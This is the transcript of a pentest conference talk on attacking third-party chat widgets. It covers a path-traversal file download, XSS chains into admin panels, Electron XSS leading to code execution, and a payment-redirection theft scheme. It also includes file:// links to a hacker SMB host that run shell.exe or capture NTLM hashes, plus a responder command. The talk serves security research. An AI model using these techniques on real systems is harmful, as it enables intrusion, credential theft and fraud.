$30 off During Our Annual Pro Sale. View Details »

Chat with a hacker

E K
November 21, 2017

Chat with a hacker

Talk about 3rd party application. How they can help us in pentest?
Topics:
- RCE from file upload
- JavaScript implementation and privileges
- Sad consequence via simple XSS
- Desktop applications (Electron XSS == RCE)
- RCE via scheme file:// and tricks
- A few words about mobile applications, 3rd party SDK and malware

E K

November 21, 2017
Tweet

More Decks by E K

Other Decks in Technology

Transcript

  1. Chat with a hacker
    Increase attack surface for Pentest
    A talk by Egor Karbutov and Alexey Pertsev

    View Slide

  2. • Egor Karbutov & Alexey Pertsev
    • Penetration testers @Digital Security
    • Speakers
    • Bug Hunters
    $ Whoarewe

    2

    View Slide

  3. • Chats-Chats-Chats
    • How does it works?
    • ZIP old tricks
    • RCE via ZIP
    • So much XSS
    • Electron vulnerability
    • Scheme file:// for your chats
    • Payment through chats
    • Mobile Application Chats
    Agenda
    3

    View Slide

  4. • Chat images are taken for examples
    • All coincidences are accidental
    Disclaimer
    4

    View Slide

  5. Chats-Chats-Chats
    • What are you talking about?
    • Another chat?
    5

    View Slide

  6. Chats-Chats-Chats
    • What are you talking about?
    • Another chat?
    6

    View Slide

  7. С
    7

    View Slide

  8. Chat Types
    Social Networks
    CMS
    Desktop Application
    Mobile SDK
    Browsers
    8

    View Slide

  9. • Increase attack surface
    • Social engineering attacks
    • Vulnerability of own implementations
    • Vendors vulnerability
    • User support is on the local network
    • Lack of segmentation (network)
    Does it help us? Pentest!
    9

    View Slide

  10. Chat for browsers. How does it works?
    JavaScript
    CMS = JS
    10

    View Slide

  11. • XML HTTP Request
    • Control of user data
    • Cookie
    • Tokens
    • Sensitive information
    • HTML replace
    • Remote update
    JavaScript «Privileges»
    11

    View Slide

  12. Services
    12

    View Slide

  13. Services
    12

    View Slide

  14. Services
    12

    View Slide

  15. • Social engineering attacks?
    • Will you send an EXE files?
    • We can use a couple of stupid tricks
    with ZIP
    Files
    13

    View Slide

  16. 42 Kb
    ZIP Bomb
    24 Gb?
    322 Gb?
    132 Tb?
    4.5 Pb
    Hi @sergeybelove
    from 2014 :)
    14

    View Slide

  17. ZIP Format
    15

    View Slide

  18. ZIP Traversal
    16

    View Slide

  19. Let’s send a file
    storage.servise.test
    api.servise.test
    User interface
    Operator standalone program
    17

    View Slide

  20. Let’s send a file
    storage.servise.test
    api.servise.test
    Sending the file
    cat.png
    User interface
    Operator standalone program
    17

    View Slide

  21. Let’s send a file
    storage.servise.test
    api.servise.test
    Sending the file
    cat.png
    cat.png == id
    User interface
    Operator standalone program
    17

    View Slide

  22. Let’s send a file
    storage.servise.test
    api.servise.test
    Sending the file
    cat.png
    cat.png == id
    User interface
    Operator standalone program
    File Message

    file_path= “/file/id”
    17

    View Slide

  23. Let’s send a file
    storage.servise.test
    api.servise.test
    File Message

    file_path= “/file/id”
    Sending the file
    cat.png
    cat.png == id
    User interface
    Operator standalone program
    File Message

    file_path= “/file/id”
    17

    View Slide

  24. Let’s send a file
    storage.servise.test
    api.servise.test
    File Message

    file_path= “/file/id”
    Concat(‘https://storage.service.test', file_path);
    Sending the file
    cat.png
    cat.png == id
    User interface
    Operator standalone program
    File Message

    file_path= “/file/id”
    17

    View Slide

  25. Let’s send a file
    storage.servise.test
    api.servise.test
    File Message

    file_path= “/file/id”
    Concat(‘https://storage.service.test', file_path);
    Download file
    GET /file/id HTTP/1.1
    Host: storage.service.test
    Sending the file
    cat.png
    cat.png == id
    User interface
    Operator standalone program
    File Message

    file_path= “/file/id”
    17

    View Slide

  26. Let’s send a file
    storage.servise.test
    api.servise.test
    File Message

    file_path= “/file/id”
    Concat(‘https://storage.service.test', file_path);
    Download file
    GET /file/id HTTP/1.1
    Host: storage.service.test
    %Downloads%/cat.png
    Sending the file
    cat.png
    cat.png == id
    User interface
    Operator standalone program
    File Message

    file_path= “/file/id”
    17

    View Slide

  27. RCE via File
    api.servise.test
    User interface
    Operator standalone program
    18

    View Slide

  28. RCE via File
    api.servise.test
    Sending the file
    cat.png
    User interface
    Operator standalone program
    18

    View Slide

  29. RCE via File
    api.servise.test
    Sending the file
    cat.png
    File Message

    file_path = 

    “.hacker.site/file/id”
    User interface
    Operator standalone program
    18

    View Slide

  30. RCE via File
    api.servise.test
    File Message

    file_path =

    “.hacker.test/file/id”
    Sending the file
    cat.png
    File Message

    file_path = 

    “.hacker.site/file/id”
    User interface
    Operator standalone program
    18

    View Slide

  31. RCE via File
    api.servise.test
    File Message

    file_path =

    “.hacker.test/file/id”
    Concat(‘https://storage.service.test', file_path);
    Sending the file
    cat.png
    File Message

    file_path = 

    “.hacker.site/file/id”
    User interface
    Operator standalone program
    18

    View Slide

  32. RCE via File
    storage.servise.test.hacke.site
    api.servise.test
    File Message

    file_path =

    “.hacker.test/file/id”
    Concat(‘https://storage.service.test', file_path);
    Sending the file
    cat.png
    File Message

    file_path = 

    “.hacker.site/file/id”
    User interface
    Operator standalone program
    18

    View Slide

  33. RCE via File
    storage.servise.test.hacke.site
    api.servise.test
    File Message

    file_path =

    “.hacker.test/file/id”
    Concat(‘https://storage.service.test', file_path);
    Sending the file
    cat.png
    File Message

    file_path = 

    “.hacker.site/file/id”
    User interface
    Operator standalone program
    ../../../../../../../shell.exe == id
    18

    View Slide

  34. RCE via File
    storage.servise.test.hacke.site
    api.servise.test
    File Message

    file_path =

    “.hacker.test/file/id”
    Concat(‘https://storage.service.test', file_path);
    Download file
    GET /file/id HTTP/1.1
    Host: storage.service.test.hacke.site
    Sending the file
    cat.png
    File Message

    file_path = 

    “.hacker.site/file/id”
    User interface
    Operator standalone program
    ../../../../../../../shell.exe == id
    18

    View Slide

  35. RCE via File
    storage.servise.test.hacke.site
    api.servise.test
    File Message

    file_path =

    “.hacker.test/file/id”
    Concat(‘https://storage.service.test', file_path);
    Download file
    GET /file/id HTTP/1.1
    Host: storage.service.test.hacke.site
    %Downloads%/shell.exe
    Sending the file
    cat.png
    File Message

    file_path = 

    “.hacker.site/file/id”
    User interface
    Operator standalone program
    ../../../../../../../shell.exe == id
    18

    View Slide

  36. • XSS is the maximum impact
    • High level of message security
    • Not obvious places
    • Headers
    • GET/POST parameters for analytics
    • Our target is Admin page or statistic page
    XSS
    19

    View Slide

  37. • User-Agent
    • Referrer
    • Cookie
    • Origin
    • Custom Headers
    Headers for XSS
    20

    View Slide

  38. • Methods
    • GET
    • POST
    • WebSocket
    Parameters for XSS
    21
    Keep it simple. Use gray box
    analysis!

    View Slide

  39. • Waiting for someone to visit this page
    • Abuse of complaints against administrators
    Admin & Statistic Page
    22

    View Slide

  40. The sad consequences
    • XSS into chat settings
    • Appearance customisation
    • Fonts
    • Labels
    • Color
    • Image
    • etc
    23

    View Slide

  41. Attack scheme №1
    pentest_client.shop.test
    Evil Hacker
    24

    View Slide

  42. Attack scheme №1
    XSS attack on chat
    pentest_client.shop.test
    Evil Hacker
    24

    View Slide

  43. Attack scheme №1
    XSS attack on chat
    pentest_client.shop.test
    Evil Hacker
    statistic_vendor.chat.test
    admin_vendor.chat.test
    24

    View Slide

  44. Attack scheme №1
    XSS attack on chat
    pentest_client.shop.test
    Evil Hacker
    XSS attack on
    client admins
    statistic_vendor.chat.test
    admin_vendor.chat.test
    24

    View Slide

  45. Attack scheme №1
    XSS attack on chat
    pentest_client.shop.test
    Evil Hacker
    XSS attack on
    client admins
    statistic_vendor.chat.test
    admin_vendor.chat.test
    24

    View Slide

  46. Attack scheme №1
    XSS attack on chat
    pentest_client.shop.test
    Evil Hacker
    XSS attack on
    client admins
    JS code injection
    into chat settings
    statistic_vendor.chat.test
    admin_vendor.chat.test
    24

    View Slide

  47. Attack scheme №1
    XSS attack on chat
    pentest_client.shop.test
    Evil Hacker
    XSS attack on
    client admins
    JS code injection
    into chat settings
    XSS from any
    user on the site
    statistic_vendor.chat.test
    admin_vendor.chat.test
    24

    View Slide

  48. Attack scheme №1
    XSS attack on chat
    pentest_client.shop.test
    Evil Hacker
    XSS attack on
    client admins
    JS code injection
    into chat settings
    XSS from any
    user on the site
    pentest_client.shop.test
    statistic_vendor.chat.test
    admin_vendor.chat.test
    24

    View Slide

  49. Attack scheme №2
    Evil Hacker
    statistic.chat.vendor
    admin.chat.vendor
    chat.vendor
    25

    View Slide

  50. Attack scheme №2
    XSS attack on chat
    Evil Hacker
    statistic.chat.vendor
    admin.chat.vendor
    chat.vendor
    25

    View Slide

  51. Attack scheme №2
    XSS attack on chat
    Evil Hacker
    XSS attack on
    vendor admins
    statistic.chat.vendor
    admin.chat.vendor
    chat.vendor
    25

    View Slide

  52. Attack scheme №2
    XSS attack on chat
    Evil Hacker
    XSS attack on
    vendor admins
    statistic.chat.vendor
    admin.chat.vendor
    chat.vendor
    25

    View Slide

  53. Attack scheme №2
    XSS attack on chat
    Evil Hacker
    XSS attack on
    vendor admins
    JS code injection
    into chat settings
    statistic.chat.vendor
    admin.chat.vendor
    chat.vendor
    25

    View Slide

  54. Attack scheme №2
    XSS attack on chat
    Evil Hacker
    XSS attack on
    vendor admins
    JS code injection
    into chat settings
    XSS from any
    user on the site
    statistic.chat.vendor
    admin.chat.vendor
    chat.vendor
    25

    View Slide

  55. Attack scheme №2
    XSS attack on chat
    Evil Hacker
    XSS attack on
    vendor admins
    JS code injection
    into chat settings
    XSS from any
    user on the site
    statistic.chat.vendor
    admin.chat.vendor
    chat.vendor
    chat.vendor
    25

    View Slide

  56. Attack scheme №2
    XSS attack on chat
    Evil Hacker
    XSS attack on
    vendor admins
    JS code injection
    into chat settings
    XSS from any
    user on the site
    XSS from any
    user on
    chat clients
    statistic.chat.vendor
    admin.chat.vendor
    chat.vendor
    chat.vendor
    25

    View Slide

  57. Attack scheme №2
    XSS attack on chat
    Evil Hacker
    XSS attack on
    vendor admins
    JS code injection
    into chat settings
    XSS from any
    user on the site
    XSS from any
    user on
    chat clients
    statistic.chat.vendor
    admin.chat.vendor
    statistic_vendor.chat.test
    admin_vendor.chat.test
    chat.test
    All chat clients services
    chat.vendor
    chat.vendor
    25

    View Slide

  58. Electron
    • OpenSource framework to build desktop
    apps using HTML, CSS and JavaScript
    • Electron accomplishes this by combining
    Chromium and Node.js into a single
    runtime
    • Chats vendor use Electron for admin
    desktop applications
    26

    View Slide

  59. • Electron Threat Model = Browser Threat Model
    • Untrusted content from the web
    • SOP Bypass
    • Control whether access to Node.js primitives is allowed from
    JavaScript
    • Potential access to Node.js primitives
    • Limited sandbox
    • XSS == RCE
    Electron Threat Model
    https://doyensec.com/resources/us-17-Carettoni-Electronegativity-A-Study-Of-Electron-Security.pdf
    https://blog.doyensec.com/2017/08/03/electron-framework-security.html
    27

    View Slide

  60. • nodeIntegration = true
    Electron sandbox bypass
    Electron 1.6.7
    28

    View Slide

  61. • nodeIntegration = true
    • Misconfiguration
    • SOP bypass via presence of privileged URLs
    • Switch false
    Electron sandbox bypass
    29

    View Slide

  62. • Typically used to retrieve files from networks and local disks
    • Vulnerability in the wild
    • Local File Inclusion
    • XXE
    • SSRF
    • Windows context
    • NTLM Hash Stealing
    • NTLM Relay
    • RCE
    File://
    30

    View Slide

  63. • Admin desktop application for Windows
    • Available scheme file://
    • Scheme file:// like hyperlink
    Chats with File://
    31

    View Slide

  64. Chats with File://
    pentest_client.shop.test Admin desktop application
    Send NTLM hash
    Send file:// link
    file://hacker.test/
    Hacker SMB
    Hash Cracking
    SMB Relay
    • Pentest in local network
    • RCE on client device and servers
    • Weakness & duplicate passwords (local services, servers, client
    devices)
    32

    View Slide

  65. • What can we do?
    • File:// with local files
    • file://C:/Windows/System32/calc.exe
    Tricks with File:// №1
    • But we can’t use arguments
    file://C:/Windows/System32/cmd.exe /C calc
    • All symbols in file link is a path
    • It is only for social engineering attacks
    • You can combine this with dir traversal ZIP trick
    33

    View Slide

  66. • File:// with execute files from the Internet (Hacker SMB server)
    • file://internet_IP/pwn.exe
    Tricks with File:// №2
    34

    View Slide

  67. Chats with File://
    pentest_client.shop.test
    Admin desktop application
    Download
    shell.exe
    Send file:// link

    on execute file
    file://hacker.test/shell.exe
    Hacker SMB
    • Pentest internet service and local network
    • RCE on client device
    • Social engineering attacks + file://local_files
    Clicking on the link
    Admin OS
    Executing
    shell.exe
    35

    View Slide

  68. • How to bypass Windows alert window?
    • “This file is in a location outside your local network”
    • Easy, I’ll use local addresses
    • 10.0.0.0—10.255.255.255
    • 172.16.0.0—172.31.255.255
    • 192.168.0.0—192.168.255.255
    • No, it isn’t work
    Tricks with File:// №3
    36

    View Slide

  69. • “Local network” from OS Windows is servers with NetBios name
    • NetBios name - Domain names without dot
    • If I’ll use NetBios name “netbios” instead of “local IP”, I can bypass
    that alert
    • file://netbios/pwn.exe
    • How?
    • Smbd (samba) server + responder –d netbios –I eth0
    • Working only in local networks
    Tricks with File:// №3
    37

    View Slide

  70. Chats with File://
    • NetBios name trick in local network
    • Without alert window
    pentest_client.shop.test Admin desktop application
    Send file:// link

    on execute file
    file://netbios/pwn.exe
    Hacker SMB
    Clicking on the link
    Admin OS
    Download
    shell.exe
    Executing
    shell.exe
    38

    View Slide

  71. Add payment system
    Useful?
    Be careful to store a configs!
    39

    View Slide

  72. Hacker can buy IPhone for free
    40
    Shop backend

    View Slide

  73. Hacker can buy IPhone for free
    POST /pay?params=1
    • shopId
    • customer
    • sum
    • item
    • …
    40
    Shop backend

    View Slide

  74. Hacker can buy IPhone for free
    POST /pay?params=1
    • shopId
    • customer
    • sum
    • item
    • …
    Redirect to payment page
    40
    Shop backend

    View Slide

  75. Hacker can buy IPhone for free
    POST /pay?params=1
    • shopId
    • customer
    • sum
    • item
    • …
    Redirect to payment page
    checkURL
    YES
    40
    Shop backend

    View Slide

  76. Hacker can buy IPhone for free
    POST /pay?params=1
    • shopId
    • customer
    • sum
    • item
    • …
    Redirect to payment page
    checkURL
    YES
    Evil Hacker
    40
    Shop backend

    View Slide

  77. Hacker can buy IPhone for free
    POST /pay?params=1
    • shopId
    • customer
    • sum
    • item
    • …
    Redirect to payment page
    checkURL
    YES
    Evil Hacker
    avisoURL
    IPhone
    X
    40
    Shop backend

    View Slide

  78. Stealing money for hackers
    POST /pay?params=1
    • shopId
    • customer
    • sum
    • item
    • …
    Steps to take profit:
    • Register own shop with similar name
    • Change shopId via XSS
    • Call checkURL and avisoURL as needed
    • All payments for hackers !
    Protection:
    • Check Yandex Ips
    • Add anti-CSRF token for config form
    • DO NOT SHOW ANY PASSWORDS EVER
    41

    View Slide

  79. • Custom code for native applications
    • All code have only one privileges in Mobile OS
    • 3rd party applications have full access in your app
    • Change the user interface
    • Access to local files in folder app
    • Access to dynamic user data
    • Change logic app (like tapjacking)
    • Vulnerability
    • Custom implementation
    • WebView JS manipulation (Android)
    Mobile Application SDK
    https://labs.mwrinfosecurity.com/blog/webview-addjavascriptinterface-remote-code-execution/
    42

    View Slide

  80. • ExpensiveWall is spread to different apps as an SDK called
    “gtk,”
    • ExpensiveWall sends data about the infected device to its C&C
    server, including its location and unique identifiers, such as
    MAC and IP addresses, IMSI, and IMEI.
    • Total Downloads infected applications = 5,904,511
    ExpensiveWall
    https://blog.checkpoint.com/2017/09/14/expensivewall-dangerous-packed-malware-google-play-will-hit-wallet/
    43

    View Slide

  81. • Farms that overestimate the rating of applications
    • Dynamic code execution and code update
    • JSPatch iOS
    • Android Runtime
    • Valid Ad that were vulnerable
    • Application with fake (Ad) SDK
    • Code review custom SDK code
    Don’t forget about
    44

    View Slide

  82. • For pentest and red team
    • Increase your attack surface via 3rd party services and program library
    • For you and your project
    • Think how much you trust other people’s implementations,
    applications in your devices, plugins in your program
    • Don’t forget about code review!
    • All vulnerability are reported and fixed
    Conclusion
    45

    View Slide

  83. Questions? Or
    @ShikariSenpai @_p4lex
    Egor Karbutov
    Alexey Pertsev
    Special THX to @cherboff and @barracud4_

    View Slide